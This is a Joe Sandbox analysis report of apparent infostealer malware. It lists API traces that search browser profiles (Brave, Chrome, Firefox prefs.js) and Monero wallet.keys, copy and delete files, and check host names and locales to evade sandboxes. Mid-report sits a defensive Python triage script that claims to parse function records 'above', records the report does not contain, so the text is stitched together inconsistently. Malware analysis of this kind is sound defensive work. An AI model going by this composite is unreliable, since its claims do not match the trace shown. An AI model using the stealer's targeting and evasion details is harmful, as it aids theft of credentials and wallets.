                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006810F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: b0bd933760dc070704358c37edaa009eea0e5388c2f57b00394a101063807f63
                            • Instruction ID: abb53f2ab95196be0a43ee9829758997e9f1d0599a284dfdcc2df8f5da75049d
                            • Opcode Fuzzy Hash: b0bd933760dc070704358c37edaa009eea0e5388c2f57b00394a101063807f63
                            • Instruction Fuzzy Hash: FBF0E271641208BBEB14ABA8AC49FAAB7ECE706B15F300548F504E7280D9729E00CBA4
                            APIs
                              • Part of subcall function 006978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                              • Part of subcall function 006978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                              • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                              • Part of subcall function 00697850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                              • Part of subcall function 00697850: RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                              • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                            • ExitProcess.KERNEL32 ref: 006811C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: a6b69b9f34c7656981b521422e33e9b8e7413bf31a27caa175a191343be9bfbf
                            • Instruction ID: 86063916dce87cf05e20b9b666490c98c209b118acc6fd5ea155ea3d57d60522
                            • Opcode Fuzzy Hash: a6b69b9f34c7656981b521422e33e9b8e7413bf31a27caa175a191343be9bfbf
                            • Instruction Fuzzy Hash: 2CE0ECB592420956CE4473B0AD0AF2A32AE6B16749F040539BA05D6602FA25E801866E
                            APIs
                            • wsprintfA.USER32 ref: 006938CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 006938E3
                            • lstrcat.KERNEL32(?,?), ref: 00693935
                            • StrCmpCA.SHLWAPI(?,006A0F70), ref: 00693947
                            • StrCmpCA.SHLWAPI(?,006A0F74), ref: 0069395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00693C67
                            • FindClose.KERNEL32(000000FF), ref: 00693C7C
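The "APIs" bullets of the function records above (the GlobalMemoryStatusEx check, the OpenEventA/Sleep loop, the VirtualAllocExNuma probe, the large VirtualAlloc/VirtualFree pair, the GetComputerNameA/GetUserNameA lookups before ExitProcess, and the wininet request) carry their arguments as raw hex, so the constants that matter for triage have to be decoded by hand. The Python below is an added example, not part of the report or of Joe Sandbox: it parses those bullets, decodes the Win32 constants (MEM_*, PAGE_*, EVENT_ALL_ACCESS, INTERNET_SERVICE_HTTP, INTERNET_OPTION_SECURITY_FLAGS and the INTERNET_FLAG_* bits, all with the values from the Windows SDK headers) and flags the evasion patterns this sample shows. The sample bullets are copied from this page, keyed by their first call site; the 256 MB and 5 s thresholds are arbitrary triage choices of this example. One caveat the example relies on: the report prints the stack contents at the call site, so the five values on the GetCurrentProcess line (an API that takes no arguments) are the arguments of the VirtualAllocExNuma call that follows it.

```python
"""Parse the "APIs" bullets of Joe Sandbox function records, decode the argument
constants that matter for triage, and flag the evasion patterns this report shows.
Constructed input: bullets copied from this page, keyed by their first call site."""
import re

FUNCTIONS = {
    "0068123E": [
        "• GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E",
        "• __aulldiv.LIBCMT ref: 00681258",
        "• ExitProcess.KERNEL32 ref: 00681294"],
    "00696ACA": [  # trailing stack slots of the OpenEventA line trimmed
        "• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013A8AA0), ref: 00696ACA",
        "• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8",
        "• Sleep.KERNEL32(00001770), ref: 00696B04",
        "• ExitProcess.KERNEL32 ref: 00696B22"],
    "0068112B": [  # the stack slots shown on GetCurrentProcess belong to VirtualAllocExNuma
        "• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B",
        "• VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132",
        "• ExitProcess.KERNEL32 ref: 00681143"],
    "006810B3": [
        "• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006810B3",
        "• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006810F7"],
    "006811C6": [
        "  • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F",
        "  • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F",
        "• ExitProcess.KERNEL32 ref: 006811C6"],
    "00695228": [
        "  • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335",
        "  • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00686385",
        "  • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF",
        "• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228"],
}

LINE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                  r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
INET = {0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}


def bits(v, table):
    return "|".join(name for bit, name in table.items() if v & bit) or hex(v)


# (api, zero-based argument index) -> decoder, indices per the Win32 prototypes;
# the GetCurrentProcess entries decode the stack slots of the call that follows it.
DECODE = {
    ("Sleep", 0): lambda v: f"{v} ms",
    ("VirtualAlloc", 1): lambda v: f"{v / 1e6:.0f} MB",
    ("VirtualAlloc", 2): lambda v: bits(v, MEM),
    ("VirtualAlloc", 3): lambda v: PAGE.get(v, hex(v)),
    ("VirtualFree", 2): lambda v: bits(v, MEM),
    ("GetCurrentProcess", 2): lambda v: bits(v, MEM),
    ("GetCurrentProcess", 3): lambda v: PAGE.get(v, hex(v)),
    ("OpenEventA", 0): lambda v: "EVENT_ALL_ACCESS" if v == 0x1F0003 else hex(v),
    ("InternetConnectA", 5): lambda v: "INTERNET_SERVICE_HTTP" if v == 3 else hex(v),
    ("HttpOpenRequestA", 6): lambda v: bits(v, INET),
    ("InternetSetOptionA", 1): lambda v: "INTERNET_OPTION_SECURITY_FLAGS" if v == 0x1F else hex(v),
}


def parse_line(line):
    """One bullet -> {api, module, args, ref, sub}; '?' becomes None, 8-hex-digit values become ints."""
    m = LINE.match(line)
    if not m:
        raise ValueError(f"unrecognised API bullet: {line!r}")
    raw = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
    args = [None if a == "?" else int(a, 16) if re.fullmatch(r"[0-9A-F]{8}", a) else a for a in raw]
    return {"api": m["api"], "module": m["mod"], "args": args, "ref": m["ref"], "sub": m["sub"]}


def decode(call):
    return [DECODE[(call["api"], i)](a) if isinstance(a, int) and (call["api"], i) in DECODE else a
            for i, a in enumerate(call["args"])]


def triage(calls):
    """Evasion patterns that the API mix of one function record reveals (heuristics)."""
    apis, out = {c["api"] for c in calls}, []
    if {"GlobalMemoryStatusEx", "ExitProcess"} <= apis:
        out.append("RAM-size gate: GlobalMemoryStatusEx result decides ExitProcess")
    if {"VirtualAllocExNuma", "ExitProcess"} <= apis:
        out.append("NUMA probe: VirtualAllocExNuma failure leads to ExitProcess")
    if apis & {"GetComputerNameA", "GetUserNameA"} and "ExitProcess" in apis:
        out.append("host/user name read before ExitProcess (name blocklist gate)")
    if {"OpenEventA", "CreateEventA"} <= apis:
        out.append("named event polled via OpenEventA/CreateEventA (instance or completion guard)")
    for c in calls:
        a = c["args"]
        if c["api"] == "VirtualAlloc" and len(a) > 1 and isinstance(a[1], int) and a[1] >= 256_000_000:
            out.append(f"large allocation probe: VirtualAlloc({a[1] / 1e6:.0f} MB)"
                       + (", released again" if "VirtualFree" in apis else ""))
        if c["api"] == "Sleep" and a and isinstance(a[0], int) and a[0] >= 5000:
            out.append(f"delay: Sleep({a[0]} ms)")
    return out


def analyze(functions=FUNCTIONS):
    report = {}
    for key, lines in functions.items():
        calls = [parse_line(line) for line in lines]
        report[key] = {"calls": [(c["api"], decode(c)) for c in calls], "findings": triage(calls)}
    return report


if __name__ == "__main__":
    for key, rec in analyze().items():
        print(key, rec["findings"])
        for api, args in rec["calls"]:
            print("    ", api, args)
```

Running it shows, among other things, that the VirtualAlloc/VirtualFree pair requests exactly 399,000,000 bytes with MEM_COMMIT|MEM_RESERVE and PAGE_READWRITE and releases it again (a memory-capacity probe), that the NUMA allocation asks for 0x7D0 bytes of PAGE_EXECUTE_READWRITE memory, that the Sleep in the event loop is 6000 ms, and that the HTTP request is opened with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE and INTERNET_OPTION_SECURITY_FLAGS is set before HttpSendRequestA. The subcall lines are kept because the name-lookup gate is only visible once GetComputerNameA and GetUserNameA from the callees are seen next to the caller's ExitProcess.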
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: dada1de0d4af592c62ca3c2be2859d3e9b4c1b1e2f2bab803fea54ac6b68f73c
                            • Instruction ID: 9e8026a8da236e06e74ec0958f162d4e6fa059cd7c6249f7482866e4fd388306
                            • Opcode Fuzzy Hash: dada1de0d4af592c62ca3c2be2859d3e9b4c1b1e2f2bab803fea54ac6b68f73c
                            • Instruction Fuzzy Hash: 5CA161B19002189FDF24EFA4DC85FEA737DFB54300F044588A60DA6641EB759B84CFA2
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,006A0B32,006A0B2B,00000000,?,?,?,006A13F4,006A0B2A), ref: 0068BEF5
                            • StrCmpCA.SHLWAPI(?,006A13F8), ref: 0068BF4D
                            • StrCmpCA.SHLWAPI(?,006A13FC), ref: 0068BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0068C7D1
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: 5a8719cd3608e571f53e8d2140fbd1cf3b0c96c7d329ac7ce8a4f92cec8149d6
                            • Instruction ID: bb528bd5f694eb06a99d664f57c8e545f037bc76af6a54cc0e6b57642ce28442
                            • Opcode Fuzzy Hash: 5a8719cd3608e571f53e8d2140fbd1cf3b0c96c7d329ac7ce8a4f92cec8149d6
                            • Instruction Fuzzy Hash: 974252729101089BDF54FBF0DD96EED73BEAB44300F40465CB90AA6581EE349B49CBE6
                            APIs
                            • wsprintfA.USER32 ref: 0069492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00694943
                            • StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                            • StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                            • FindClose.KERNEL32(000000FF), ref: 00694B92
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 1a4724820192dff018d151a69397fd339d6e748aa5279ba3076b4a632488a8dc
                            • Instruction ID: 78fc735b6ace992c67b08d689b94c499c69758d53faaadf73f85c9bc69124622
                            • Opcode Fuzzy Hash: 1a4724820192dff018d151a69397fd339d6e748aa5279ba3076b4a632488a8dc
                            • Instruction Fuzzy Hash: E56144B1900218ABCB24EBA0DC49EEA73BDBB49704F04859CB549A6141EF75DB45CF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00694580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00694587
                            • wsprintfA.USER32 ref: 006945A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 006945BD
                            • StrCmpCA.SHLWAPI(?,006A0FC4), ref: 006945EB
                            • StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0069468B
                            • FindClose.KERNEL32(000000FF), ref: 006946A0
                            • lstrcat.KERNEL32(?,013AE320), ref: 006946C5
                            • lstrcat.KERNEL32(?,013AD2F8), ref: 006946D8
                            • lstrlen.KERNEL32(?), ref: 006946E5
                            • lstrlen.KERNEL32(?), ref: 006946F6
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 3d7351b8f0803406705d14128c1727d51688b41c3b1b8b1bbc744cba8065dcfd
                            • Instruction ID: c6b91625debfb2830a9a7990ccbcb1ccf4af48b1a25618ae5ece774eb695e75e
                            • Opcode Fuzzy Hash: 3d7351b8f0803406705d14128c1727d51688b41c3b1b8b1bbc744cba8065dcfd
                            • Instruction Fuzzy Hash: 7F5153B190021CAFCB64EBB0DC89FE9737DBB58304F404598F64996190EF759B858FA2
                            APIs
                            • wsprintfA.USER32 ref: 00693EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00693EDA
                            • StrCmpCA.SHLWAPI(?,006A0FAC), ref: 00693F08
                            • StrCmpCA.SHLWAPI(?,006A0FB0), ref: 00693F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0069406C
                            • FindClose.KERNEL32(000000FF), ref: 00694081
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: ce715a5ef81cb4a2634684fe95228f02fe91160028b7274a9921a74719031d4f
                            • Instruction ID: 68bebdad48561e918c3516fb6c1c47a0b03ae3b0a3cd90fcae18f1bf441d0325
                            • Opcode Fuzzy Hash: ce715a5ef81cb4a2634684fe95228f02fe91160028b7274a9921a74719031d4f
                            • Instruction Fuzzy Hash: ED5154B2900218AFCF24FBB0DC85EEA737DBB44304F00459CB65996140EB759B868F95
                            APIs
                            • wsprintfA.USER32 ref: 0068ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0068ED55
                            • StrCmpCA.SHLWAPI(?,006A1538), ref: 0068EDAB
                            • StrCmpCA.SHLWAPI(?,006A153C), ref: 0068EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0068F2C3
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: e5ecc11ffa6ab2c8ff5bba05dfe4643207672dba11c1be2dd30eb6eb72e93c93
                            • Instruction ID: 7ec0505d578a628fd99a90c892ebf4b41794f6dc4735573eb5edc745c2fc6655
                            • Opcode Fuzzy Hash: e5ecc11ffa6ab2c8ff5bba05dfe4643207672dba11c1be2dd30eb6eb72e93c93
                            • Instruction Fuzzy Hash: 0AE1F4719211189ADF94FBA0CD52EEE737EAF54300F40419DB50A66492EF306F8ACF96
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A15B8,006A0D96), ref: 0068F71E
                            • StrCmpCA.SHLWAPI(?,006A15BC), ref: 0068F76F
                            • StrCmpCA.SHLWAPI(?,006A15C0), ref: 0068F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0068FAC3
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: a4af25c3c67c405287bddf11c2dfa52b9740d175dcb501c6457d8a1d11698648
                            • Instruction ID: 021593f021a61d71e557ff09b409c22fb31e927ab00fb4b9c7473a6f00cb5716
                            • Opcode Fuzzy Hash: a4af25c3c67c405287bddf11c2dfa52b9740d175dcb501c6457d8a1d11698648
                            • Instruction Fuzzy Hash: BBB132719101189BDF64FBA0DD56AED73BEAF54300F4086ACA40A9A541EF306B49CFD6
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A510C,?,?,?,006A51B4,?,?,00000000,?,00000000), ref: 00681923
                            • StrCmpCA.SHLWAPI(?,006A525C), ref: 00681973
                            • StrCmpCA.SHLWAPI(?,006A5304), ref: 00681989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00681D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00681DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00681E20
                            • FindClose.KERNEL32(000000FF), ref: 00681E32
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: cb6631caf2b846da3fdc980ac8c66782e9073ab779c150603b5b179b445cf4a2
                            • Instruction ID: dd5abab29a256707da7e3d01b0d806f1a0b2d88a2566d3903675d3c9eb215ac1
                            • Opcode Fuzzy Hash: cb6631caf2b846da3fdc980ac8c66782e9073ab779c150603b5b179b445cf4a2
                            • Instruction Fuzzy Hash: B5122E719211189BCF59FBA0CD96AEE73BEAF14300F40419DA50A66491EF306F8ACFD5
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006A0C2E), ref: 0068DE5E
                            • StrCmpCA.SHLWAPI(?,006A14C8), ref: 0068DEAE
                            • StrCmpCA.SHLWAPI(?,006A14CC), ref: 0068DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0068E3F2
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 27be54cd596a04bf5d78b3720b56190260bae21bee2d7fa1c0df762fd046d4a5
                            • Instruction ID: a064995e11bd5dcad4dca91cc9772bf8e2f66b664f196283bacb1ed496496c92
                            • Opcode Fuzzy Hash: 27be54cd596a04bf5d78b3720b56190260bae21bee2d7fa1c0df762fd046d4a5
                            • Instruction Fuzzy Hash: A2F19E718201289ADF59FBA0CD95EEE73BEBF15300F40419DA40A66491EF306F4ACFA5
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A14B0,006A0C2A), ref: 0068DAEB
                            • StrCmpCA.SHLWAPI(?,006A14B4), ref: 0068DB33
                            • StrCmpCA.SHLWAPI(?,006A14B8), ref: 0068DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0068DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 433a8be4990543e0293c4f55639242e6fe8223f37f1bfbd6e7803fd38c0e559f
                            • Instruction ID: 1885f702fde1be2ad21e59c5c9d8e0cb1d97975ab39737c25087decee4ae7074
                            • Opcode Fuzzy Hash: 433a8be4990543e0293c4f55639242e6fe8223f37f1bfbd6e7803fd38c0e559f
                            • Instruction Fuzzy Hash: 9B91247691010897CF54FBF0ED56DED73BEAB84304F40865CF90A9A581EE349B098BE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &@_$Q+^$l275$zDo$|+%o$}B]$MQu$l=
                            • API String ID: 0-2462393236
                            • Opcode ID: dce029451645033dca21ded304a7c77f8eda77927f3e4de3f032f8365a1a2b95
                            • Instruction ID: c81ec145fd46ed5c0fe5fb35de4cfb1285e554ce3bd2812bba654f190c555774
                            • Opcode Fuzzy Hash: dce029451645033dca21ded304a7c77f8eda77927f3e4de3f032f8365a1a2b95
                            • Instruction Fuzzy Hash: 65B226F36082049FE704AE2DEC8567AB7E5EF94320F1A853DEAC5C3744EA3598058797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %p]$>.k:$G`SO$Tzu?$bgg$nYw$oHm$wU~
                            • API String ID: 0-3825258456
                            • Opcode ID: c5a35523ff53bd509feafa1e65edd5b03add1b584f334c89b9564514d3ba5d41
                            • Instruction ID: afee47ddc9f77d99794ddb2614dc64b4d3e2a6095202be5dffb6e715fb9e7c4d
                            • Opcode Fuzzy Hash: c5a35523ff53bd509feafa1e65edd5b03add1b584f334c89b9564514d3ba5d41
                            • Instruction Fuzzy Hash: A7B204B3A0C2049FE304AE2DEC8566AFBE9EF94720F16493DE6C4C3744E63598458797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %hAD$F~$SRy$c/g$i|%m$&=$>iV$4
                            • API String ID: 0-4117549361
                            • Opcode ID: 03ecc88c491178b53ead6c2e69c26a270f4ae5a95742527fdc7c88b9d727b9a6
                            • Instruction ID: a29e5cf929db4afdd57c073f15bab740a0ba17e8852c09299df1d8235dacffb7
                            • Opcode Fuzzy Hash: 03ecc88c491178b53ead6c2e69c26a270f4ae5a95742527fdc7c88b9d727b9a6
                            • Instruction Fuzzy Hash: C3B217F3A0C2049FE304AF2DEC8567ABBE9EF94720F1A492DE6C5C7344E63558058693
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: BBn$Ben$Q@7_$W-6T$X@m:$hV |$oH_O$W{
                            • API String ID: 0-1066827417
                            • Opcode ID: 59acf40cde368ac9c683a9f2a9c195d21e55a543c2e3d4946f5d3e0e2948ad1a
                            • Instruction ID: 78db22a519cc885052c5cb5d2e3de94d739e275ddfe9fefad9b41bfa6ef18993
                            • Opcode Fuzzy Hash: 59acf40cde368ac9c683a9f2a9c195d21e55a543c2e3d4946f5d3e0e2948ad1a
                            • Instruction Fuzzy Hash: C9A204F360C214AFE304AE2DDC8577ABBE9EF94720F16493DEAC4C7744E63598008696
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,006A05AF), ref: 00697BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00697BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00697C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00697C62
                            • LocalFree.KERNEL32(00000000), ref: 00697D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: f2e8da10a320f7758b08bafbb040c12d5f01138541f0c4a651e4727cbbb318bb
                            • Instruction ID: 24adfabde122e360de14caccf88316785634ff75ce80814485fccab7ed03b875
                            • Opcode Fuzzy Hash: f2e8da10a320f7758b08bafbb040c12d5f01138541f0c4a651e4727cbbb318bb
                            • Instruction Fuzzy Hash: A9416C71911218ABDF24DB94DC99FEEB3B9FF44700F204199E00962680DB342F86CFA5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 22y$>ob~$OM$VT{$XVL$]e[?$is
                            • API String ID: 0-3334281120
                            • Opcode ID: e0cf282e30779b72b22697b48149bc39262f3d099452ce0286a83b6e1e7cf194
